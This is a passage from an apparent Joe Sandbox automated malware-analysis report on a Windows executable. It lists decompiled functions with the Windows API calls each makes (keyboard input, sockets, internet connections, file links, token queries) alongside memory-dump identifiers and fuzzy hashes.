                      • Part of subcall function 006FDAB9: CharLowerBuffW.USER32(?,?,?,?,00000000,?,?), ref: 006FDAD9
                    • VirtualAlloc.KERNEL32(00000000,00000077,00003000,00000040), ref: 006FE615
                    • _memmove.LIBCMT ref: 006FE628
                    Memory Dump Source
                    • Source File: 00000000.00000002.1673751140.0000000000681000.00000020.00000001.01000000.00000003.sdmp, Offset: 00680000, based on PE: true
                    • Associated: 00000000.00000002.1673739282.0000000000680000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1673791806.000000000070F000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1673791806.0000000000735000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1673823909.000000000073F000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1673836454.0000000000748000.00000002.00000001.01000000.00000003.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_680000_220204-TF1--00.jbxd
                    Similarity
                    • API ID: BuffCharLower$AllocVirtual_memmove
                    • String ID:
                    • API String ID: 3659485706-0
                    • Opcode ID: c03770580db2fa32980190a2a7789ffd2652e516457b96bdcec23613eee95c4d
                    • Instruction ID: c7767cc11f022f687a801d9dcdff7641e954ed52139113e737010e51fff2df91
                    • Opcode Fuzzy Hash: c03770580db2fa32980190a2a7789ffd2652e516457b96bdcec23613eee95c4d
                    • Instruction Fuzzy Hash: 0BC17B716083058FC754DF28C48096ABBE6FF89714F14896EF9999B361D732E906CF82
                    Function 006D6DF3 Relevance: 6.2, APIs: 4, Instructions: 202memoryCOMMON
                    Download Yara Rule
                    APIs
                    Memory Dump Source
                    • Source File: 00000000.00000002.1673751140.0000000000681000.00000020.00000001.01000000.00000003.sdmp, Offset: 00680000, based on PE: true
                    • Associated: 00000000.00000002.1673739282.0000000000680000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1673791806.000000000070F000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1673791806.0000000000735000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1673823909.000000000073F000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1673836454.0000000000748000.00000002.00000001.01000000.00000003.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_680000_220204-TF1--00.jbxd
                    Similarity
                    • API ID: Variant$AllocClearCopyInitString
                    • String ID:
                    • API String ID: 2808897238-0
                    • Opcode ID: 4baec7bdc5941da1ea6311ce42fb5f3eafff80d237c98da32783e8cbf52104be
                    • Instruction ID: 78db568a27a273ffe0e2427361bf6ea3841adc8241fb629f99f7a2002e2afb96
                    • Opcode Fuzzy Hash: 4baec7bdc5941da1ea6311ce42fb5f3eafff80d237c98da32783e8cbf52104be
                    • Instruction Fuzzy Hash: 3251B870E087019ADB70AF65D891A79B3E7AF48310F24881FF956CB3D1EB7098419B5A
                    Function 00709A63 Relevance: 6.1, APIs: 4, Instructions: 140COMMON
                    Download Yara Rule
                    APIs
                    • GetWindowRect.USER32(00CDE570,?), ref: 00709AD2
                    • ScreenToClient.USER32(00000002,00000002), ref: 00709B05
                    • MoveWindow.USER32(?,?,?,?,000000FF,00000001,?,?,00000002,?,?), ref: 00709B72
                    Memory Dump Source
                    • Source File: 00000000.00000002.1673751140.0000000000681000.00000020.00000001.01000000.00000003.sdmp, Offset: 00680000, based on PE: true
                    • Associated: 00000000.00000002.1673739282.0000000000680000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1673791806.000000000070F000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1673791806.0000000000735000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1673823909.000000000073F000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1673836454.0000000000748000.00000002.00000001.01000000.00000003.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_680000_220204-TF1--00.jbxd
                    Similarity
                    • API ID: Window$ClientMoveRectScreen
                    • String ID:
                    • API String ID: 3880355969-0
                    • Opcode ID: 4c857681d87f1b48971937957fc2baba77f2aa392acafcf35bacd2c21ca1b381
                    • Instruction ID: fc1dc691c7c2eca2d48c77fc2bc10a0b79037be3f5e296515c7a2550f258bbee
                    • Opcode Fuzzy Hash: 4c857681d87f1b48971937957fc2baba77f2aa392acafcf35bacd2c21ca1b381
                    • Instruction Fuzzy Hash: 56512C74A00209EFCF20DF68D8809AE7BF6FB55324F108269F9159B291D738AD81CB90
                    Function 006F6CBD Relevance: 6.1, APIs: 4, Instructions: 127networkCOMMON
                    Download Yara Rule
                    APIs
                    • socket.WSOCK32(00000002,00000002,00000011), ref: 006F6CE4
                    • WSAGetLastError.WSOCK32(00000000), ref: 006F6CF4
                      • Part of subcall function 00689997: __itow.LIBCMT ref: 006899C2
                      • Part of subcall function 00689997: __swprintf.LIBCMT ref: 00689A0C
                    • #21.WSOCK32(?,0000FFFF,00000020,00000002,00000004), ref: 006F6D58
                    • WSAGetLastError.WSOCK32(00000000), ref: 006F6D64
                    Memory Dump Source
                    • Source File: 00000000.00000002.1673751140.0000000000681000.00000020.00000001.01000000.00000003.sdmp, Offset: 00680000, based on PE: true
                    • Associated: 00000000.00000002.1673739282.0000000000680000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1673791806.000000000070F000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1673791806.0000000000735000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1673823909.000000000073F000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1673836454.0000000000748000.00000002.00000001.01000000.00000003.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_680000_220204-TF1--00.jbxd
                    Similarity
                    • API ID: ErrorLast$__itow__swprintfsocket
                    • String ID:
                    • API String ID: 2214342067-0
                    • Opcode ID: 696fbefbd2cd1150e6264a89b0d899cef62db9ab70de92dfa57c9f334584f573
                    • Instruction ID: a6af897282b6afecf7219f5fe4ec3b6190a48e3dd567e73f631c76258f414f99
                    • Opcode Fuzzy Hash: 696fbefbd2cd1150e6264a89b0d899cef62db9ab70de92dfa57c9f334584f573
                    • Instruction Fuzzy Hash: 9941A374740200AFEB60BF24DC86F7A77E69F08B10F48811CFA59AB3D2DA759C018795
                    Function 006F672D Relevance: 6.1, APIs: 4, Instructions: 116COMMON
                    Download Yara Rule
                    APIs
                    • #16.WSOCK32(?,?,00000000,00000000,00000000,00000000,?,?,00000000,0070F910), ref: 006F67BA
                    • _strlen.LIBCMT ref: 006F67EC
                    Memory Dump Source
                    • Source File: 00000000.00000002.1673751140.0000000000681000.00000020.00000001.01000000.00000003.sdmp, Offset: 00680000, based on PE: true
                    • Associated: 00000000.00000002.1673739282.0000000000680000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1673791806.000000000070F000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1673791806.0000000000735000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1673823909.000000000073F000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1673836454.0000000000748000.00000002.00000001.01000000.00000003.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_680000_220204-TF1--00.jbxd
                    Similarity
                    • API ID: _strlen
                    • String ID:
                    • API String ID: 4218353326-0
                    • Opcode ID: 653d2c213f9ed1ea54c0c3844e7de7665ecff3894fc3ca568545453321f12793
                    • Instruction ID: 2e73dfe2d364ec724a90637ea96caf418f9c8a8ccece0fbe772310e4a1ba16ff
                    • Opcode Fuzzy Hash: 653d2c213f9ed1ea54c0c3844e7de7665ecff3894fc3ca568545453321f12793
                    • Instruction Fuzzy Hash: DB419335A00108AFCB54FB64DCC5FBEB3AAAF45354F14826DF92697292DB30AD01CB64
                    Function 006EBA5F Relevance: 6.1, APIs: 4, Instructions: 111fileCOMMON
                    Download Yara Rule
                    APIs
                    • CreateHardLinkW.KERNEL32(00000002,?,00000000), ref: 006EBB09
                    • GetLastError.KERNEL32(?,00000000), ref: 006EBB2F
                    • DeleteFileW.KERNEL32(00000002,?,00000000), ref: 006EBB54
                    • CreateHardLinkW.KERNEL32(00000002,?,00000000,?,00000000), ref: 006EBB80
                    Memory Dump Source
                    • Source File: 00000000.00000002.1673751140.0000000000681000.00000020.00000001.01000000.00000003.sdmp, Offset: 00680000, based on PE: true
                    • Associated: 00000000.00000002.1673739282.0000000000680000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1673791806.000000000070F000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1673791806.0000000000735000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1673823909.000000000073F000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1673836454.0000000000748000.00000002.00000001.01000000.00000003.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_680000_220204-TF1--00.jbxd
                    Similarity
                    • API ID: CreateHardLink$DeleteErrorFileLast
                    • String ID:
                    • API String ID: 3321077145-0
                    • Opcode ID: 631641dd86d09a8452513b8c633f16d9b6f8d45e63f5ba76e9a9c565283c9d8e
                    • Instruction ID: c2b420fc16e14849c1836c138e8cbd946b0f772f13ee287d6169efd9054ed734
                    • Opcode Fuzzy Hash: 631641dd86d09a8452513b8c633f16d9b6f8d45e63f5ba76e9a9c565283c9d8e
                    • Instruction Fuzzy Hash: F8411A39200650DFCF21EF55C585A6EBBE2EF49310B198598EC4A9B762CB34FD01CBA5
                    Function 00708AC0 Relevance: 6.1, APIs: 4, Instructions: 109COMMON
                    Download Yara Rule
                    APIs
                    • InvalidateRect.USER32(?,00000000,00000001,?,?,?), ref: 00708B4D
                    Memory Dump Source
                    • Source File: 00000000.00000002.1673751140.0000000000681000.00000020.00000001.01000000.00000003.sdmp, Offset: 00680000, based on PE: true
                    • Associated: 00000000.00000002.1673739282.0000000000680000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1673791806.000000000070F000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1673791806.0000000000735000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1673823909.000000000073F000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1673836454.0000000000748000.00000002.00000001.01000000.00000003.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_680000_220204-TF1--00.jbxd
                    Similarity
                    • API ID: InvalidateRect
                    • String ID:
                    • API String ID: 634782764-0
                    • Opcode ID: 9f81ac8dbbdb0b751ebc019b321774f400e3a995155b03f70dd10ed6c21b9cfb
                    • Instruction ID: a5df20647e8351cdf86ec3a398e627eeb2f6fe14f7496cfa5a94cf312fcfe6f5
                    • Opcode Fuzzy Hash: 9f81ac8dbbdb0b751ebc019b321774f400e3a995155b03f70dd10ed6c21b9cfb
                    • Instruction Fuzzy Hash: 8531C1F4600204FEEBA09A18CC45FA93BE5EB06324F248716FA91D66E1DF38A9409757
                    Function 0070ADF1 Relevance: 6.1, APIs: 4, Instructions: 106windowCOMMON
                    Download Yara Rule
                    APIs
                    • ClientToScreen.USER32(?,?), ref: 0070AE1A
                    • GetWindowRect.USER32(?,?), ref: 0070AE90
                    • PtInRect.USER32(?,?,0070C304), ref: 0070AEA0
                    • MessageBeep.USER32(00000000), ref: 0070AF11
                    Memory Dump Source
                    • Source File: 00000000.00000002.1673751140.0000000000681000.00000020.00000001.01000000.00000003.sdmp, Offset: 00680000, based on PE: true
                    • Associated: 00000000.00000002.1673739282.0000000000680000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1673791806.000000000070F000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1673791806.0000000000735000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1673823909.000000000073F000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1673836454.0000000000748000.00000002.00000001.01000000.00000003.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_680000_220204-TF1--00.jbxd
                    Similarity
                    • API ID: Rect$BeepClientMessageScreenWindow
                    • String ID:
                    • API String ID: 1352109105-0
                    • Opcode ID: dac34328ae32d77bb489886aabbc10c9e3dd76653599043ba775c8ea014aff15
                    • Instruction ID: 157b5e68a71602a8076adc93bcb23d7859bf6b109b009b9e565df24b8d9a427f
                    • Opcode Fuzzy Hash: dac34328ae32d77bb489886aabbc10c9e3dd76653599043ba775c8ea014aff15
                    • Instruction Fuzzy Hash: 1A418E74600319EFCB11CF58C885BA97BF5FB4A350F2882A9E814CB291D739E841DF52
                    Function 006E0FE6 Relevance: 6.1, APIs: 4, Instructions: 105keyboardwindowCOMMON
                    Download Yara Rule
                    APIs
                    • GetKeyboardState.USER32(?,00000000,?,00000001), ref: 006E1037
                    • SetKeyboardState.USER32(00000080,?,00000001), ref: 006E1053
                    • PostMessageW.USER32(00000000,00000102,00000001,00000001), ref: 006E10B9
                    • SendInput.USER32(00000001,00000000,0000001C,00000000,?,00000001), ref: 006E110B
                    Memory Dump Source
                    • Source File: 00000000.00000002.1673751140.0000000000681000.00000020.00000001.01000000.00000003.sdmp, Offset: 00680000, based on PE: true
                    • Associated: 00000000.00000002.1673739282.0000000000680000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1673791806.000000000070F000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1673791806.0000000000735000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1673823909.000000000073F000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1673836454.0000000000748000.00000002.00000001.01000000.00000003.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_680000_220204-TF1--00.jbxd
                    Similarity
                    • API ID: KeyboardState$InputMessagePostSend
                    • String ID:
                    • API String ID: 432972143-0
                    • Opcode ID: 959a6e176d6c8bc6cfa68b001d1a323c43e2ee1472662cd184c4f4334e8647a8
                    • Instruction ID: b3f506f4f9e0a2fb0dab049f7235a612acd9cce4cddbf4b2a617f9b320717b35
                    • Opcode Fuzzy Hash: 959a6e176d6c8bc6cfa68b001d1a323c43e2ee1472662cd184c4f4334e8647a8
                    • Instruction Fuzzy Hash: 5D316B30E427C8AEFF308B678C05BF9BBABAB46310F04431AE5905A2D0CB7449D5A765
                    Function 006E1121 Relevance: 6.1, APIs: 4, Instructions: 101keyboardwindowCOMMON
                    Download Yara Rule
                    APIs
                    • GetKeyboardState.USER32(?,75C0C0D0,?,00008000), ref: 006E1176
                    • SetKeyboardState.USER32(00000080,?,00008000), ref: 006E1192
                    • PostMessageW.USER32(00000000,00000101,00000000), ref: 006E11F1
                    • SendInput.USER32(00000001,?,0000001C,75C0C0D0,?,00008000), ref: 006E1243
                    Memory Dump Source
                    • Source File: 00000000.00000002.1673751140.0000000000681000.00000020.00000001.01000000.00000003.sdmp, Offset: 00680000, based on PE: true
                    • Associated: 00000000.00000002.1673739282.0000000000680000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1673791806.000000000070F000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1673791806.0000000000735000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1673823909.000000000073F000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1673836454.0000000000748000.00000002.00000001.01000000.00000003.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_680000_220204-TF1--00.jbxd
                    Similarity
                    • API ID: KeyboardState$InputMessagePostSend
                    • String ID:
                    • API String ID: 432972143-0
                    • Opcode ID: df0c2a686fcb2c2c38788ab72d0c1c768f4cb5ee30ba3fc75fb4f0a0d57ac4a7
                    • Instruction ID: 18344a0df82e832b32a5497acd1c529bf6e7b8ed43976f08a699456a6dc53bb4
                    • Opcode Fuzzy Hash: df0c2a686fcb2c2c38788ab72d0c1c768f4cb5ee30ba3fc75fb4f0a0d57ac4a7
                    • Instruction Fuzzy Hash: E9316B30A413889EFF308A678C047FA7BABAB4A310F04431EE2919A6D1C3754A95A755
                    Function 006B6415 Relevance: 6.1, APIs: 4, Instructions: 97COMMONLIBRARYCODE
                    Download Yara Rule
                    APIs
                    • _LocaleUpdate::_LocaleUpdate.LIBCMT ref: 006B644B
                    • __isleadbyte_l.LIBCMT ref: 006B6479
                    • MultiByteToWideChar.KERNEL32(00000080,00000009,00000002,00000001,00000000,00000000,?,00000000,00000000,?,?), ref: 006B64A7
                    • MultiByteToWideChar.KERNEL32(00000080,00000009,00000002,00000001,00000000,00000000,?,00000000,00000000,?,?), ref: 006B64DD
                    Memory Dump Source
                    • Source File: 00000000.00000002.1673751140.0000000000681000.00000020.00000001.01000000.00000003.sdmp, Offset: 00680000, based on PE: true
                    • Associated: 00000000.00000002.1673739282.0000000000680000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1673791806.000000000070F000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1673791806.0000000000735000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1673823909.000000000073F000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1673836454.0000000000748000.00000002.00000001.01000000.00000003.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_680000_220204-TF1--00.jbxd
                    Similarity
                    • API ID: ByteCharLocaleMultiWide$UpdateUpdate::___isleadbyte_l
                    • String ID:
                    • API String ID: 3058430110-0
                    • Opcode ID: 71d32ef9537442f04af8cf99e88032ff7011b4035254803155f98661b59a594e
                    • Instruction ID: 964b945cbd28e37b5941f6371739c310852d2eec024794a11f88c708b740f1d5
                    • Opcode Fuzzy Hash: 71d32ef9537442f04af8cf99e88032ff7011b4035254803155f98661b59a594e
                    • Instruction Fuzzy Hash: 9831DEB160064AEFDB21CF64C844BEA7BE6FF41310F158429F854872A1EB39D891DB90
                    Function 00705175 Relevance: 6.1, APIs: 4, Instructions: 95COMMON
                    Download Yara Rule
                    APIs
                    • GetForegroundWindow.USER32 ref: 00705189
                      • Part of subcall function 006E387D: GetWindowThreadProcessId.USER32(00000000,00000000), ref: 006E3897
                      • Part of subcall function 006E387D: GetCurrentThreadId.KERNEL32 ref: 006E389E
                      • Part of subcall function 006E387D: AttachThreadInput.USER32(00000000,?,006E52A7), ref: 006E38A5
                    • GetCaretPos.USER32(?), ref: 0070519A
                    • ClientToScreen.USER32(00000000,?), ref: 007051D5
                    • GetForegroundWindow.USER32 ref: 007051DB
                    Memory Dump Source
                    • Source File: 00000000.00000002.1673751140.0000000000681000.00000020.00000001.01000000.00000003.sdmp, Offset: 00680000, based on PE: true
                    • Associated: 00000000.00000002.1673739282.0000000000680000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1673791806.000000000070F000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1673791806.0000000000735000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1673823909.000000000073F000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1673836454.0000000000748000.00000002.00000001.01000000.00000003.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_680000_220204-TF1--00.jbxd
                    Similarity
                    • API ID: ThreadWindow$Foreground$AttachCaretClientCurrentInputProcessScreen
                    • String ID:
                    • API String ID: 2759813231-0
                    • Opcode ID: e5e13f4a8ed9c785ead653320bf65ef32636148dbf29cccf4750c29c85def9b1
                    • Instruction ID: f3c80057c923de129a1a1d836d956f5ef74ca49a0dd869b9fcf93e5a6906dfbc
                    • Opcode Fuzzy Hash: e5e13f4a8ed9c785ead653320bf65ef32636148dbf29cccf4750c29c85def9b1
                    • Instruction Fuzzy Hash: 7D314D71900108AFCB50EFA5C885AEFB7FAEF98304F14416AE406E7241EA759E00CBA4
                    Function 0070C788 Relevance: 6.1, APIs: 4, Instructions: 83windowCOMMON
                    Download Yara Rule
                    APIs
                      • Part of subcall function 00682612: GetWindowLongW.USER32(?,000000EB), ref: 00682623
                    • GetCursorPos.USER32(?), ref: 0070C7C2
                    • TrackPopupMenuEx.USER32(?,00000000,?,?,?,00000000,?,006BBBFB,?,?,?,?,?), ref: 0070C7D7
                    • GetCursorPos.USER32(?), ref: 0070C824
                    • DefDlgProcW.USER32(?,0000007B,?,?,?,?,?,?,?,?,?,?,006BBBFB,?,?,?), ref: 0070C85E
                    Memory Dump Source
                    • Source File: 00000000.00000002.1673751140.0000000000681000.00000020.00000001.01000000.00000003.sdmp, Offset: 00680000, based on PE: true
                    • Associated: 00000000.00000002.1673739282.0000000000680000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1673791806.000000000070F000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1673791806.0000000000735000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1673823909.000000000073F000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1673836454.0000000000748000.00000002.00000001.01000000.00000003.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_680000_220204-TF1--00.jbxd
                    Similarity
                    • API ID: Cursor$LongMenuPopupProcTrackWindow
                    • String ID:
                    • API String ID: 2864067406-0
                    • Opcode ID: 44fce5c17184fc6d5f06aaebf1713c0b6c841715d57deb980d9bd58be8655e5f
                    • Instruction ID: 8645abdb43b2e5e2b36cd32964d2ac65682c1138cc9ee28d1b27e45c623f0b54
                    • Opcode Fuzzy Hash: 44fce5c17184fc6d5f06aaebf1713c0b6c841715d57deb980d9bd58be8655e5f
                    • Instruction Fuzzy Hash: 20317335500018EFCB26CF58CC98EEA7BFAEB4A710F048269F9058B2A1D7795D50DB69
                    Function 006A0BD0 Relevance: 6.1, APIs: 4, Instructions: 79COMMON
                    Download Yara Rule
                    APIs
                    • __setmode.LIBCMT ref: 006A0BF2
                      • Part of subcall function 00685B75: WideCharToMultiByte.KERNEL32(00000000,00000000,?,00000001,00000000,00000000,00000000,00000000,00000000,00000000,?,006E7B20,?,?,00000000), ref: 00685B8C
                      • Part of subcall function 00685B75: WideCharToMultiByte.KERNEL32(00000000,00000000,?,00000001,00000000,?,00000000,00000000,?,?,006E7B20,?,?,00000000,?,?), ref: 00685BB0
                    • _fprintf.LIBCMT ref: 006A0C29
                    • OutputDebugStringW.KERNEL32(?), ref: 006D6331
                      • Part of subcall function 006A4CDA: _flsall.LIBCMT ref: 006A4CF3
                    • __setmode.LIBCMT ref: 006A0C5E
                    Memory Dump Source
                    • Source File: 00000000.00000002.1673751140.0000000000681000.00000020.00000001.01000000.00000003.sdmp, Offset: 00680000, based on PE: true
                    • Associated: 00000000.00000002.1673739282.0000000000680000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1673791806.000000000070F000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1673791806.0000000000735000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1673823909.000000000073F000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1673836454.0000000000748000.00000002.00000001.01000000.00000003.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_680000_220204-TF1--00.jbxd
                    Similarity
                    • API ID: ByteCharMultiWide__setmode$DebugOutputString_flsall_fprintf
                    • String ID:
                    • API String ID: 521402451-0
                    • Opcode ID: 8800403e12188f41e2234cfae2eedf2af2f0b28aa37f6b35410f144dbab7216a
                    • Instruction ID: 2d01771947002b27b3877ba6dd2cf80a459d7f6c80dd16e9b698f5cd5fc093b1
                    • Opcode Fuzzy Hash: 8800403e12188f41e2234cfae2eedf2af2f0b28aa37f6b35410f144dbab7216a
                    • Instruction Fuzzy Hash: D11127319042047FDB44B7B89C439BE7B6B9F86320F14421EF20557282DFB15D424BA9
                    Function 006D8B9E Relevance: 6.1, APIs: 4, Instructions: 79memoryCOMMON
                    Download Yara Rule
                    APIs
                      • Part of subcall function 006D8652: GetTokenInformation.ADVAPI32(?,00000003(TokenIntegrityLevel),?,00000000,?), ref: 006D8669
                      • Part of subcall function 006D8652: GetLastError.KERNEL32(?,TokenIntegrityLevel,?,00000000,?), ref: 006D8673
                      • Part of subcall function 006D8652: GetProcessHeap.KERNEL32(00000008,?,?,TokenIntegrityLevel,?,00000000,?), ref: 006D8682
                      • Part of subcall function 006D8652: HeapAlloc.KERNEL32(00000000,?,TokenIntegrityLevel,?,00000000,?), ref: 006D8689
                      • Part of subcall function 006D8652: GetTokenInformation.ADVAPI32(?,00000003(TokenIntegrityLevel),00000000,?,?,?,TokenIntegrityLevel,?,00000000,?), ref: 006D869F
                    • LookupPrivilegeValueW.ADVAPI32(00000000,?,?), ref: 006D8BEB
                    • _memcmp.LIBCMT ref: 006D8C0E
                    • GetProcessHeap.KERNEL32(00000000,00000000), ref: 006D8C44
                    • HeapFree.KERNEL32(00000000), ref: 006D8C4B
                    Memory Dump Source
                    • Source File: 00000000.00000002.1673751140.0000000000681000.00000020.00000001.01000000.00000003.sdmp, Offset: 00680000, based on PE: true
                    • Associated: 00000000.00000002.1673739282.0000000000680000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1673791806.000000000070F000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1673791806.0000000000735000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1673823909.000000000073F000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1673836454.0000000000748000.00000002.00000001.01000000.00000003.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_680000_220204-TF1--00.jbxd
                    Similarity
                    • API ID: Heap$InformationProcessToken$AllocErrorFreeLastLookupPrivilegeValue_memcmp
                    • String ID:
                    • API String ID: 1592001646-0
                    • Opcode ID: 548c2b6ac3a20038b22be9c022c4024cfd7fa08868f2ab74aa8490dd78d44695
                    • Instruction ID: 8cbe0957886cd92476739f7dad57b992965c3232df23f6aff553a4f015aa5606
                    • Opcode Fuzzy Hash: 548c2b6ac3a20038b22be9c022c4024cfd7fa08868f2ab74aa8490dd78d44695
                    • Instruction Fuzzy Hash: FA219D71E11208EFDB10DFA4C949BEEB7B9EF44354F14809AE454AB340EB35AE06CB60
                    Function 006F1A5B Relevance: 6.1, APIs: 4, Instructions: 78networkCOMMON
                    Download Yara Rule
                    APIs
                    • InternetConnectW.WININET(?,?,?,?,?,?,00000000,00000000), ref: 006F1A97
                      • Part of subcall function 006F1B21: InternetOpenUrlW.WININET(?,?,00000000,00000000,?,00000000), ref: 006F1B40
                      • Part of subcall function 006F1B21: InternetCloseHandle.WININET(00000000), ref: 006F1BDD
                    Memory Dump Source
                    • Source File: 00000000.00000002.1673751140.0000000000681000.00000020.00000001.01000000.00000003.sdmp, Offset: 00680000, based on PE: true
                    • Associated: 00000000.00000002.1673739282.0000000000680000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1673791806.000000000070F000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1673791806.0000000000735000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1673823909.000000000073F000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1673836454.0000000000748000.00000002.00000001.01000000.00000003.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_680000_220204-TF1--00.jbxd
                    Similarity
                    • API ID: Internet$CloseConnectHandleOpen
                    • String ID:
                    • API String ID: 1463438336-0
                    • Opcode ID: 7d9855c9491ae1816efa9474e30fe5e4a3fc580db80cf19a3e061b99120e844f
                    • Instruction ID: df2359abc1d233b03d36fd0529878e19f1497dfdfbe4ed726ad4fda9bd819012
                    • Opcode Fuzzy Hash: 7d9855c9491ae1816efa9474e30fe5e4a3fc580db80cf19a3e061b99120e844f
                    • Instruction Fuzzy Hash: EC21A135200609FFDB229F608C01FBBB7AEFF85741F10411AFB119A651EB71D8119BA5
                    Function 006DE1AF Relevance: 6.1, APIs: 3, Strings: 1, Instructions: 68stringCOMMON
                    Download Yara Rule
                    APIs
                      • Part of subcall function 006DF5AD: lstrlenW.KERNEL32(?,00000002,?,?,000000EF,?,006DE1C4,?,?,?,006DEFB7,00000000,000000EF,00000119,?,?), ref: 006DF5BC
                      • Part of subcall function 006DF5AD: lstrcpyW.KERNEL32(00000000,?), ref: 006DF5E2
